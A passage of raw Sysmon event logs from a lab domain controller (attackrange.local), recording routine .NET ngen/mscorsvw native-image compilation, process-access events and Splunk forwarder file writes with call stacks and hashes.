be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.374{4DB9351A-A17A-60D3-0C03-00000000CF01}3860NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MTYPYA5NLE\CustomMarshalers.ni.dll.auxMD5=A2AB2FCA847D5A56A6CBC60C30746E57,SHA256=A2BAAB933EB75B68F913C983F22A8940DF435BF948775140CEDE51AC4095A368,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.374{4DB9351A-A17A-60D3-0C03-00000000CF01}3860NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MTYPYA5NLE\CustomMarshalers.ni.dllMD5=AF7ADECB9CC4D188412413B4CA9E0E61,SHA256=46AB95E9C4B39D1D65A08ED2047903F2A03D266260234F58EBC7F6AC3246E111,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:50.359{4DB9351A-A17A-60D3-0C03-00000000CF01}3860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f14-0\CustomMarshalers.dll2021-06-23 21:02:50.359 10341000x800000000000000019771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.265{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0C03-00000000CF01}3860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.234{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17A-60D3-0C03-00000000CF01}3860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.234{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17A-60D3-0C03-00000000CF01}3860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.156{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0B03-00000000CF01}5732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.140{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17A-60D3-0B03-00000000CF01}5732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.124{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17A-60D3-0B03-00000000CF01}5732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.062{4DB9351A-A179-60D3-0A03-00000000CF01}4392NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Q4JCG2CG8M\System.Web.Services.ni.dll.auxMD5=A73316AF3F9FC8940FDDAA9FE1D75E84,SHA256=9B1EBA9891AFA6A63EA266F2A0DF0A406A8DCC9D0B831A8A651813CACB592E9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.062{4DB9351A-A179-60D3-0A03-00000000CF01}4392NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Q4JCG2CG8M\System.Web.Services.ni.dllMD5=F80E6DD1B9694714BA86689D897A9D2B,SHA256=A3E8DB2AB8D68211AA2C81AEACA3F9E4DFB9A6EB5DA11EF8DFEA9D5930F289A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.019{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=128B0D7CED7F7C686A0B7D3CE9248351,SHA256=8AFD51410C1BB632A64FAD0E611AA41DD08A079D45954071247AD694ECE95C5E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:49.988{4DB9351A-A179-60D3-0A03-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1128-0\System.Web.Services.dll2021-06-23 21:02:49.988 23542300x800000000000000019791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:51.282{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60CA59A944F52D8D4CEE08392665B5C5,SHA256=BEB44D005F4998E03856862B2BAD7910019DA1913FE3C8928503145093F5BD16,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:51.171{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17B-60D3-1003-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:51.156{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17B-60D3-1003-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:51.156{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17B-60D3-1003-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:51.046{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57AFBB240B0A0C5F56431D8B18B913B7,SHA256=0E3D89C138B96519E3A96199DFCAA65C974EF59BD37E4DE740F23896BF19A348,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.610{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17C-60D3-1203-00000000CF01}6732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.593{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17C-60D3-1203-00000000CF01}6732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.593{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17C-60D3-1203-00000000CF01}6732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.296{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D42703D1932D0186B43C4980D6D4D67,SHA256=716C589F94D4CFC43D61820CB788C88F538D896AAC666163A66167E832A07834,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.296{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17C-60D3-1103-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.265{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17C-60D3-1103-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.265{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17C-60D3-1103-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.171{4DB9351A-A17B-60D3-1003-00000000CF01}4116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VA4USU5A5W\System.Xaml.ni.dll.auxMD5=31606CBBAA0EE6736F8A987EF1749068,SHA256=39E3E727CB4F1038B8C7187E39892B2CD0B013665036C10FC2A4A9AC0DD10E1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:52.171{4DB9351A-A17B-60D3-1003-00000000CF01}4116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VA4USU5A5W\System.Xaml.ni.dllMD5=7C975A8EACFF62312E2D02A8376A8239,SHA256=7303B52675CA2FA78C41D957924264E7EA216CE93C65516A8B22B61465F4397D,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:52.125{4DB9351A-A17B-60D3-1003-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1014-0\System.Xaml.dll2021-06-23 21:02:52.125 23542300x800000000000000019811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.374{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F0B3FB47611753919C58FD30A3ADC0,SHA256=95146D2A2A976B3067C8465AAACA48A7D75705BC534E0045520630AA7D8D7983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.281{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E85DC99B87F8F6148D1D4D7AFAC2650,SHA256=01CBE33B1FD7E198A7D8EAB8AAE1C85D7AF941454BA125F4A585660F828F9E37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.218{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A17D-60D3-1303-00000000CF01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.203{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 